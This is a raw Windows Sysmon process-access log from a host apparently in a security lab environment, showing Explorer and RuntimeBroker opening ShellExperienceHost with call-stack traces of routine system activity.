13:58:35.258{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405756C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405748C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405736C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405728C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
